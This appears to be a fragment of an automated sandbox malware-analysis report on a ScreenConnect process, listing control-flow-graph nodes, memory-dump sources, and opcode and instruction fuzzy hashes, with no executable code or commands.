1238->1255 1248 7ffd9bb867cd-7ffd9bb867fd 1239->1248 1240->1248 1246 7ffd9bb869c6-7ffd9bb869cb 1243->1246 1244->1246 1246->1174 1248->1225 1265 7ffd9bb867ff-7ffd9bb86801 1248->1265 1258 7ffd9bb8687e-7ffd9bb86880 1249->1258 1250->1258 1264 7ffd9bb865b3-7ffd9bb865c1 1254->1264 1255->1264 1258->1174 1267 7ffd9bb86886-7ffd9bb86894 1258->1267 1281 7ffd9bb865c3-7ffd9bb865c5 1264->1281 1282 7ffd9bb865c7-7ffd9bb865d5 1264->1282 1265->1218 1271 7ffd9bb86803-7ffd9bb86808 1265->1271 1272 7ffd9bb86896-7ffd9bb86898 1267->1272 1288 7ffd9bb86b52-7ffd9bb86b5b 1268->1288 1289 7ffd9bb86b22-7ffd9bb86b31 1268->1289 1269->1268 1276 7ffd9bb8680b-7ffd9bb86811 1271->1276 1277 7ffd9bb86884-7ffd9bb86894 1272->1277 1278 7ffd9bb86898 1272->1278 1283 7ffd9bb86824-7ffd9bb8682c 1276->1283 1284 7ffd9bb86813-7ffd9bb8681b 1276->1284 1277->1272 1278->1277 1278->1278 1290 7ffd9bb865d8-7ffd9bb865e1 1281->1290 1282->1290 1286 7ffd9bb8683e 1283->1286 1287 7ffd9bb8682d-7ffd9bb8682e 1283->1287 1284->1287 1291 7ffd9bb8681d-7ffd9bb86822 1284->1291 1297 7ffd9bb86844-7ffd9bb86859 1286->1297 1296 7ffd9bb86833-7ffd9bb8683d call 7ffd9bb85598 1287->1296 1298 7ffd9bb86b33-7ffd9bb86b34 1289->1298 1299 7ffd9bb86b37-7ffd9bb86b51 1289->1299 1306 7ffd9bb865e8-7ffd9bb865ef 1290->1306 1291->1296 1294 7ffd9bb86a96-7ffd9bb86a9d 1292->1294 1293->1294 1304 7ffd9bb86a9e 1294->1304 1296->1297 1297->1218 1297->1276 1298->1299 1304->1304 1306->1177 1308 7ffd9bb865f5-7ffd9bb865fc 1306->1308 1308->1177 1309 7ffd9bb86602-7ffd9bb86619 1308->1309 1311 7ffd9bb8664e-7ffd9bb86659 1309->1311 1312 7ffd9bb8661b-7ffd9bb8662d 1309->1312 1317 7ffd9bb8665f-7ffd9bb8666e 1311->1317 1318 7ffd9bb8665b-7ffd9bb8665d 1311->1318 1315 7ffd9bb86633-7ffd9bb86641 1312->1315 1316 7ffd9bb8662f-7ffd9bb86631 1312->1316 1319 7ffd9bb86644-7ffd9bb86647 1315->1319 1316->1319 1320 7ffd9bb86671-7ffd9bb86673 1317->1320 1318->1320 1319->1311 1322 7ffd9bb86679-7ffd9bb86690 1320->1322 1323 7ffd9bb86728-7ffd9bb8673a 1320->1323 1322->1323 1327 7ffd9bb86696-7ffd9bb866b3 1322->1327 1323->1177 1330 7ffd9bb866bf 1327->1330 1331 7ffd9bb866b5-7ffd9bb866bd 1327->1331 1332 7ffd9bb866c1-7ffd9bb866c3 1330->1332 1331->1332 1332->1323 1334 7ffd9bb866c5-7ffd9bb866cf 1332->1334 1335 7ffd9bb866d1-7ffd9bb866db call 7ffd9bb83748 1334->1335 1336 7ffd9bb866dd-7ffd9bb866e5 1334->1336 1335->1177 1335->1336 1338 7ffd9bb86713-7ffd9bb86726 call 7ffd9bb85588 1336->1338 1339 7ffd9bb866e7-7ffd9bb8670c call 7ffd9bb85370 1336->1339 1338->1177 1339->1338
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: U
                                                                                                                                                                                                                  • API String ID: 0-3372436214
                                                                                                                                                                                                                  • Opcode ID: 177e87342e9d77e8cd130926564dc3d1f20784c5a8456976649ca44dc986c375
                                                                                                                                                                                                                  • Instruction ID: d1edd785bc763de09d429d7bbc89701a94f1c9be301ddf01fcb628354678d596
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 177e87342e9d77e8cd130926564dc3d1f20784c5a8456976649ca44dc986c375
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05C1B731B0AD4F4AF7B5A7A484746F962D2FF98348F560079D44EC72E6DE38BA028341
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 44f28d71b2b276a34f68ad4e98b8656b5b630605f43457aa0d08d82c64735ed5
                                                                                                                                                                                                                  • Instruction ID: 04d99295ebef5ef43e9b3959a953fef40412f857b8e59fd64c771690d4515d19
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 44f28d71b2b276a34f68ad4e98b8656b5b630605f43457aa0d08d82c64735ed5
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68A17331B1AD1F4AFBB5A7A484746F962D2FF98348F560039D40FC32E5DE39BA019680

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2975394190.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9b870000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1088084561-0
                                                                                                                                                                                                                  • Opcode ID: fd76a64adbb20af10777783cb695d2c9b1e58d35246cef367068ae50ee732756
                                                                                                                                                                                                                  • Instruction ID: 67a90bd6b6af9e926ec224fe119b2a845d54bed786f47de4aa8264090bd55c48
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fd76a64adbb20af10777783cb695d2c9b1e58d35246cef367068ae50ee732756
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 92412831D0DB494FDB29AFA8984A5E97BE0EF59310F04017FE049C3292DB78A9468B91

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 753 7ffd9bb84765-7ffd9bb84771 754 7ffd9bb84773 753->754 755 7ffd9bb84775-7ffd9bb84791 753->755 754->755 756 7ffd9bb847b5-7ffd9bb847bb 754->756 757 7ffd9bb84798-7ffd9bb8479a 755->757 758 7ffd9bb847d4-7ffd9bb847e9 756->758 759 7ffd9bb847bd-7ffd9bb847d2 756->759 761 7ffd9bb847a0-7ffd9bb847b3 757->761 762 7ffd9bb84829-7ffd9bb84832 757->762 764 7ffd9bb84833-7ffd9bb84872 758->764 765 7ffd9bb847eb-7ffd9bb84826 758->765 759->758 761->756 771 7ffd9bb84874-7ffd9bb8488b 764->771 772 7ffd9bb848bc-7ffd9bb848bf 764->772 765->762 781 7ffd9bb84891-7ffd9bb84897 771->781 782 7ffd9bb84aa8-7ffd9bb84aba 771->782 773 7ffd9bb848c1 772->773 774 7ffd9bb8493b 772->774 778 7ffd9bb848c3-7ffd9bb848cb 773->778 779 7ffd9bb84907-7ffd9bb84914 773->779 777 7ffd9bb8493c-7ffd9bb84946 774->777 793 7ffd9bb84948 777->793 778->777 785 7ffd9bb848cd-7ffd9bb848cf 778->785 783 7ffd9bb84917-7ffd9bb8492b 779->783 781->782 784 7ffd9bb8489d-7ffd9bb848a3 781->784 791 7ffd9bb8492c-7ffd9bb8493a 783->791 784->782 787 7ffd9bb848a9-7ffd9bb848af 784->787 789 7ffd9bb848d1 785->789 790 7ffd9bb8494b-7ffd9bb84954 785->790 787->782 792 7ffd9bb848b5-7ffd9bb848bb 787->792 789->783 794 7ffd9bb848d3-7ffd9bb848d7 789->794 795 7ffd9bb84956-7ffd9bb8495d 790->795 791->774 792->772 792->791 793->790 794->793 796 7ffd9bb848d9-7ffd9bb848de 794->796 797 7ffd9bb8495f-7ffd9bb84968 795->797 796->797 798 7ffd9bb848e0-7ffd9bb848e5 796->798 800 7ffd9bb8496d-7ffd9bb84988 797->800 798->795 799 7ffd9bb848e7-7ffd9bb848ec 798->799 799->800 801 7ffd9bb848ee-7ffd9bb84902 799->801 800->782 805 7ffd9bb8498e-7ffd9bb84994 800->805 801->779 801->782 805->782 806 7ffd9bb8499a-7ffd9bb849a0 805->806 806->782 807 7ffd9bb849a6-7ffd9bb849ac 806->807 807->782 808 7ffd9bb849b2-7ffd9bb84a32 807->808 808->782 816 7ffd9bb84a34-7ffd9bb84a49 call 7ffd9bb83768 808->816 819 7ffd9bb84a4e-7ffd9bb84a50 816->819 819->782 820 7ffd9bb84a52-7ffd9bb84a6e call 7ffd9bb83768 819->820 820->782 824 7ffd9bb84a70-7ffd9bb84a78 820->824 824->782 825 7ffd9bb84a7a-7ffd9bb84aa7 call 7ffd9bb83768 824->825
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: A
                                                                                                                                                                                                                  • API String ID: 0-3554254475
                                                                                                                                                                                                                  • Opcode ID: 672ab1a2803bae2dbfcab6754f9a61d4c2c57acd7af3d5bfe5e9499c0500b429
                                                                                                                                                                                                                  • Instruction ID: e1ddc934f9c1d9833726612791f40ed50009ba8b39d839366d1a41b6972c0a7d
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 672ab1a2803bae2dbfcab6754f9a61d4c2c57acd7af3d5bfe5e9499c0500b429
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 63C13632B0EE4E0BEB68EA1898A28B573D1FF55354F05017ED44E875E6ED34B94AC381

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 1346 7ffd9b873aa2-7ffd9b8780ef 1348 7ffd9b8780f6-7ffd9b878150 SetProcessMitigationPolicy 1346->1348 1349 7ffd9b878152 1348->1349 1350 7ffd9b878158-7ffd9b878187 1348->1350 1349->1350
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2975394190.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9b870000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1088084561-0
                                                                                                                                                                                                                  • Opcode ID: 420b3010a2a96fb8a7cdb3fa7c50b06283f871c9e6848394c3276eef644346e0
                                                                                                                                                                                                                  • Instruction ID: 1aaaa4419df4ffd5592ca908b5a602d0e8f5a913089580bfb99460d2d38ebbaa
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 420b3010a2a96fb8a7cdb3fa7c50b06283f871c9e6848394c3276eef644346e0
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1921D731918B188FDB28AF9D9C4AAF97BE0EB59711F00412EE049D3251DB74B8468B91

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 1362 7ffd9bb87cbd-7ffd9bb87cc7 1363 7ffd9bb87d09-7ffd9bb87d1a 1362->1363 1364 7ffd9bb87cc9-7ffd9bb87cf8 1362->1364 1366 7ffd9bb87d64-7ffd9bb87d66 1363->1366 1367 7ffd9bb87d1c-7ffd9bb87d2d 1363->1367 1368 7ffd9bb87d83-7ffd9bb87dc7 1366->1368 1369 7ffd9bb87d68-7ffd9bb87d82 1366->1369 1370 7ffd9bb87d33-7ffd9bb87d4b 1367->1370 1371 7ffd9bb87e6f-7ffd9bb87e79 1367->1371 1377 7ffd9bb87d4d-7ffd9bb87d62 1370->1377 1378 7ffd9bb87dc8-7ffd9bb87e02 1370->1378 1379 7ffd9bb87e7b-7ffd9bb87e84 1371->1379 1377->1366 1391 7ffd9bb87e04-7ffd9bb87e0f 1378->1391 1381 7ffd9bb87ece-7ffd9bb87f02 1379->1381 1382 7ffd9bb87e86-7ffd9bb87e97 1379->1382 1387 7ffd9bb87f04-7ffd9bb87f0e 1381->1387 1388 7ffd9bb87f1a-7ffd9bb87f28 1381->1388 1385 7ffd9bb87eaf-7ffd9bb87eb8 1382->1385 1386 7ffd9bb87e99-7ffd9bb87e9d 1382->1386 1390 7ffd9bb87e9e-7ffd9bb87ea4 1386->1390 1387->1388 1397 7ffd9bb87f10-7ffd9bb87f18 1387->1397 1400 7ffd9bb87f2f-7ffd9bb87f52 1388->1400 1401 7ffd9bb87f2a call 7ffd9bb87ce0 1388->1401 1393 7ffd9bb87ea6-7ffd9bb87eaa 1390->1393 1394 7ffd9bb87e11-7ffd9bb87e2d 1391->1394 1395 7ffd9bb87e5d-7ffd9bb87e6e call 7ffd9bb87e7a 1391->1395 1393->1385 1394->1390 1403 7ffd9bb87e2f-7ffd9bb87e32 1394->1403 1397->1400 1401->1400 1405 7ffd9bb87e34 1403->1405 1406 7ffd9bb87eae 1403->1406 1405->1379 1407 7ffd9bb87e36-7ffd9bb87e5b 1405->1407 1406->1385 1407->1394 1407->1395
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: U
                                                                                                                                                                                                                  • API String ID: 0-3372436214
                                                                                                                                                                                                                  • Opcode ID: bb6f925b23e3426059f5128c6f62e6f08f4ea56fbbf0d861e634ea8438b33587
                                                                                                                                                                                                                  • Instruction ID: ff2138c12271272bab32015337d5891ac5512b7bc6a1e397e08906cb92b43fb5
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb6f925b23e3426059f5128c6f62e6f08f4ea56fbbf0d861e634ea8438b33587
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA517B73A0EE4E4BEB75EA5998A45E977E2FF94319F05017AE04CC31F2DE3468058741
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: U
                                                                                                                                                                                                                  • API String ID: 0-3372436214
                                                                                                                                                                                                                  • Opcode ID: fb8ad01b8858ac15fc0ab87965e88fa11b6c85ae0cf8d6285ce767d7a0eb7021
                                                                                                                                                                                                                  • Instruction ID: f208797eab50be19796ca1a20151b1200d102e249ad0549147d561bbf6f013e7
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fb8ad01b8858ac15fc0ab87965e88fa11b6c85ae0cf8d6285ce767d7a0eb7021
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 97416371609A4D8FDF98DF28C8A4AA537A1FF59318F1505ADE41EC72E2CB35E952CB00
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: U
                                                                                                                                                                                                                  • API String ID: 0-3372436214
                                                                                                                                                                                                                  • Opcode ID: 0969c520d14d99f50ea522bed7673d3b7502c04116a8dbd9f1c9d03f4cbc201c
                                                                                                                                                                                                                  • Instruction ID: 9362734642e98c5dbed55332e1f818c86391d7b8b818c76145c0d224b2106def
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0969c520d14d99f50ea522bed7673d3b7502c04116a8dbd9f1c9d03f4cbc201c
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7031C932F0EE4D4BDFA59A585C312E93791FF45354F0501ABE54CDB1E2DA29A9008641
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: W
                                                                                                                                                                                                                  • API String ID: 0-655174618
                                                                                                                                                                                                                  • Opcode ID: bee74574c5d6e983d0ee068ef397e675b0acc862da8957267c6e6e8b045f7d3f
                                                                                                                                                                                                                  • Instruction ID: ae3009837e06a8594fcf33fb4bffbda6db2139f5bb9196605d13050415b16633
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bee74574c5d6e983d0ee068ef397e675b0acc862da8957267c6e6e8b045f7d3f
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 38215A3261DE8A4FD769EB359C604A57BE1FF85318F0506FAD04DC31E6DA38A802C741
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: U
                                                                                                                                                                                                                  • API String ID: 0-3372436214
                                                                                                                                                                                                                  • Opcode ID: 250004376e188068fa2163e1605528a671241e4b0dcb133740cc087759b026c4
                                                                                                                                                                                                                  • Instruction ID: c062318931ec4cd5c5ff5a1ae4ab34921062bdd227704aede984815077271e0f
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 250004376e188068fa2163e1605528a671241e4b0dcb133740cc087759b026c4
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8311A271E0DF4C4BDF94DBA458A55A93FA0FF59304F0600AEE058C32A2DA746500CB42
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 678b22fc545426e773d0b3ab102b6beaf39a6b3e80ce97b9354f6c4cf5377e3c
                                                                                                                                                                                                                  • Instruction ID: c7391e9b7650428c8dd301218d9d2820cea70aba37a217fccffce21b6800d211
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 678b22fc545426e773d0b3ab102b6beaf39a6b3e80ce97b9354f6c4cf5377e3c
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 67B1E235B0DA4A8FDBDDEB68D0A06E477A1FF54318B2405BAC059CB1DBDA35E842C780
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 0cd1fab99f637a2e1e448d2c0d2936727f2cffe1de4aeb6e1200440199c54eb7
                                                                                                                                                                                                                  • Instruction ID: d277bc2c7c84b04e2f9d251d65d2cb84b0a6ce64f0b4468d4b39b8f5e290ea05
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0cd1fab99f637a2e1e448d2c0d2936727f2cffe1de4aeb6e1200440199c54eb7
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C961C77270EE494FDB98EE6894A1AA477D2FFA4354F0501B9D44DCB2E6DD35F8028740
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 0239808748a1234eb185ed5de5eee6c918d07af3c7b11e302238bc6582b55cc4
                                                                                                                                                                                                                  • Instruction ID: 70739a02d4d32c00aa3edb6802b1747bbfae5d0061eee6414084fd442078977a
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0239808748a1234eb185ed5de5eee6c918d07af3c7b11e302238bc6582b55cc4
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18619235B09E0A8FDBDCEF58D0A06A577A1FF58308B2445B9D05ECB19BDA35E846C780
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 2df1482f1f2fd3af54b418722b7b9a3f29b4c10c54242d28a06a97ffa4c87619
                                                                                                                                                                                                                  • Instruction ID: adb3f5819ac954280636994f3c17b2a80961721c37680bd54a5f15492e7adc51
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2df1482f1f2fd3af54b418722b7b9a3f29b4c10c54242d28a06a97ffa4c87619
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0331C42250E3D55FC717AB68E8659D57FB0EF4322870A01E7E0D9CF0A3DA18594AC362
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 59ee4ead1ff2d62f9ca8598a01f4bdfb0cd771a90a6d2d2fdc3f6288d89df3ac
                                                                                                                                                                                                                  • Instruction ID: 4fd145e800bd2beee16e4b226b3fb7e48dcecf338199ebb6b382eed07e3871d9
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 59ee4ead1ff2d62f9ca8598a01f4bdfb0cd771a90a6d2d2fdc3f6288d89df3ac
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BA11E921B0BD1F4AFFB89B5844B06B812E1FF59318F49017DD44FCA1E7CD28A9058650
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: ec9c2396bd640fd2b0643ae542aba1d0a1fb7fcc289d53e7af09ae94a46a8d9e
                                                                                                                                                                                                                  • Instruction ID: f40605e85dce89ee78502e5d9b45243c3fd59dd00b93c33be8e4847db2b61b72
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ec9c2396bd640fd2b0643ae542aba1d0a1fb7fcc289d53e7af09ae94a46a8d9e
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34117F71B0AD094FDB98EF58C464B6977A2FF58314F0541B8C44DCB2E6DA35E9428780
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 6f246753bc8cba63d8039b92f80ba597d032540d1067cd90ac5093cad115905a
                                                                                                                                                                                                                  • Instruction ID: b146e9e69cf4414ba489917d9ef2ee9a71e06717f3a49a308e8a19f640cc6077
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f246753bc8cba63d8039b92f80ba597d032540d1067cd90ac5093cad115905a
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C117C71A0AD494FDB98EF58C464B6977A2FF68314F0541A8C44DCB2E6DA35E9028B80
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: e97f80d9ef3c0675e67402ba72cc47ec0af3fe172bb53513accc7e324d5b0d17
                                                                                                                                                                                                                  • Instruction ID: e51841964a79c6785cc68e117e066e8f20c0ea3df5488b1248ec6d8ddf558477
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e97f80d9ef3c0675e67402ba72cc47ec0af3fe172bb53513accc7e324d5b0d17
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC11A721F0EA4B0AF7BA626944B23756EE1AFA5244F4A80BEC449C61E6DC2C9D818341
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
